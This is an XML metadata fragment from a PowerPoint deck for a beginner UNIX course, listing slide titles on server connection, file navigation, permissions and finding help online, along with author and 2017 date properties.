      <vt:lpstr>Lesson 0.5: Connecting to the Server with a Mac or Linux</vt:lpstr>
      <vt:lpstr>Lseson 0.6: Connecting to the  Server with Windows</vt:lpstr>
      <vt:lpstr>Lesson 0.7:  Finishing the Connection</vt:lpstr>
      <vt:lpstr>Lesson 0.8:  Set-up For Remaining Lessons</vt:lpstr>
      <vt:lpstr>Lesson 0.9: UNIX Tips and Tricks</vt:lpstr>
      <vt:lpstr>Lesson 1:  Navigating a UNIX File System</vt:lpstr>
      <vt:lpstr>Lesson 1.0:  UNIX Command Syntax</vt:lpstr>
      <vt:lpstr>Lesson 1.1: Present Working Directory</vt:lpstr>
      <vt:lpstr>Lesson 1.2:  List Directory Contents</vt:lpstr>
      <vt:lpstr>Lesson 1.2:  List Directory Contents (ls)</vt:lpstr>
      <vt:lpstr>Lesson 1.3: Change Directory</vt:lpstr>
      <vt:lpstr>Lesson 1.3: Change Directory</vt:lpstr>
      <vt:lpstr>Lesson 1.3: Change Directory</vt:lpstr>
      <vt:lpstr>Lesson 1.3: Change Directory</vt:lpstr>
      <vt:lpstr>Lesson 1.3: Change Directory</vt:lpstr>
      <vt:lpstr>Lesson 1.3: Change Directory</vt:lpstr>
      <vt:lpstr>Lesson 1.3: Change Directory</vt:lpstr>
      <vt:lpstr>Lesson 1.3: Change Directory</vt:lpstr>
      <vt:lpstr>Exercise 1: Destination Traveling</vt:lpstr>
      <vt:lpstr>Exercise 1 Answers:</vt:lpstr>
      <vt:lpstr>Lesson 2:  Making Files and Folders </vt:lpstr>
      <vt:lpstr>Lesson 2.1: Make Directory</vt:lpstr>
      <vt:lpstr>Lesson 2.2:  Create a file with Touch</vt:lpstr>
      <vt:lpstr>Lesson 2.3: Remove</vt:lpstr>
      <vt:lpstr>Lesson 2.3: Remove File</vt:lpstr>
      <vt:lpstr>Lesson 2.3 Remove Directory</vt:lpstr>
      <vt:lpstr>Lesson 2.3:  Warning about Remove</vt:lpstr>
      <vt:lpstr>Exercise 2:  Making (and Breaking) Memories</vt:lpstr>
      <vt:lpstr>Exercise 2:  Making (and Breaking) Memories</vt:lpstr>
      <vt:lpstr>Lesson 3: Moving Things Around</vt:lpstr>
      <vt:lpstr>Lesson 3.1: Copy</vt:lpstr>
      <vt:lpstr>Lesson 3.2: Move</vt:lpstr>
      <vt:lpstr>Lesson 3.3: Rename</vt:lpstr>
      <vt:lpstr>Lesson 3.4: Viewing File Contents</vt:lpstr>
      <vt:lpstr>Lesson 3.4: Viewing File Contents</vt:lpstr>
      <vt:lpstr>Exercise 3: Moving Mountains</vt:lpstr>
      <vt:lpstr>Exercise 3: Moving Mountains</vt:lpstr>
      <vt:lpstr>Lesson 4:  Finding Things and Permissions</vt:lpstr>
      <vt:lpstr>Lesson 4.1: Find</vt:lpstr>
      <vt:lpstr>Lesson 4.1: Find &lt;search-space&gt;</vt:lpstr>
      <vt:lpstr>Lesson 4.1: Find Special Options</vt:lpstr>
      <vt:lpstr>Lesson 4.1: Find &lt;criteria&gt;</vt:lpstr>
      <vt:lpstr>Lesson 4.1: Find &lt;criteria&gt;</vt:lpstr>
      <vt:lpstr>Lesson 4.2: Permissions</vt:lpstr>
      <vt:lpstr>Lesson 4.2: Permissions</vt:lpstr>
      <vt:lpstr>Lesson 4.2: Permissions</vt:lpstr>
      <vt:lpstr>Lesson 4.2: Permissions</vt:lpstr>
      <vt:lpstr>Lesson 4.2: Permissions</vt:lpstr>
      <vt:lpstr>Lesson 4.2: Permissions</vt:lpstr>
      <vt:lpstr>Lesson 4.2: Permissions</vt:lpstr>
      <vt:lpstr>Lesson 4.2: Changing Permissions</vt:lpstr>
      <vt:lpstr>Lesson 4.2: Permission Codes</vt:lpstr>
      <vt:lpstr>Lesson 4.2: Permission Codes</vt:lpstr>
      <vt:lpstr>Lesson 4.2: Permission Codes</vt:lpstr>
      <vt:lpstr>Lesson 4.2: Changing Permissions</vt:lpstr>
      <vt:lpstr>Lesson 4.2: Changing Permissions</vt:lpstr>
      <vt:lpstr>Lesson 4.2: Changing Permissions</vt:lpstr>
      <vt:lpstr>Lesson 4.2: Changing Permissions</vt:lpstr>
      <vt:lpstr>Lesson 4.2:  Being Careful with Permissions</vt:lpstr>
      <vt:lpstr>Lesson 4.2:  Being Careful with Permissions</vt:lpstr>
      <vt:lpstr>Exercise 4:  Your Princess is in Another Castle</vt:lpstr>
      <vt:lpstr>Exercise 4:  Your Princess is in Another Castle</vt:lpstr>
      <vt:lpstr>Lesson 5: Continuing Education</vt:lpstr>
      <vt:lpstr>Lesson 5.1: With Great Power…</vt:lpstr>
      <vt:lpstr>Lesson 5.1: With Great Power…</vt:lpstr>
      <vt:lpstr>Lesson 5.1: With Great Power…</vt:lpstr>
      <vt:lpstr>Lesson 5.2: Getting Help Online</vt:lpstr>
      <vt:lpstr>Lesson 5.2: Getting Help Online</vt:lpstr>
      <vt:lpstr>Lesson 5.2: Getting Help Online</vt:lpstr>
      <vt:lpstr>Lesson 5.2: Getting Help Online</vt:lpstr>
      <vt:lpstr>Lesson 5.2:  Getting ‘Help’ Online</vt:lpstr>
      <vt:lpstr>Lesson 5.2: Getting ‘Help’ Online</vt:lpstr>
      <vt:lpstr>If You Are Not Sure What Code From the Internet Will Do…</vt:lpstr>
      <vt:lpstr>NEVER Copy and Paste Code from the Internet Directly Into the Console!!!</vt:lpstr>
      <vt:lpstr>Lesson 5.2:  Asking Questions Online</vt:lpstr>
      <vt:lpstr>Lesson 5.2: Guides</vt:lpstr>
      <vt:lpstr>Don’t Get Discouraged</vt:lpstr>
      <vt:lpstr>Closing</vt:lpstr>
      <vt:lpstr>Image Credits</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UNIX</dc:title>
  <dc:creator>Mann, Carla [GDCBS]</dc:creator>
  <cp:lastModifiedBy>Mann, Carla [GDCBS]</cp:lastModifiedBy>
  <cp:revision>102</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-02-15T18:40:10Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2017-03-01T21:07:39Z</dcterms:modified>
</cp:coreProperties>
</file>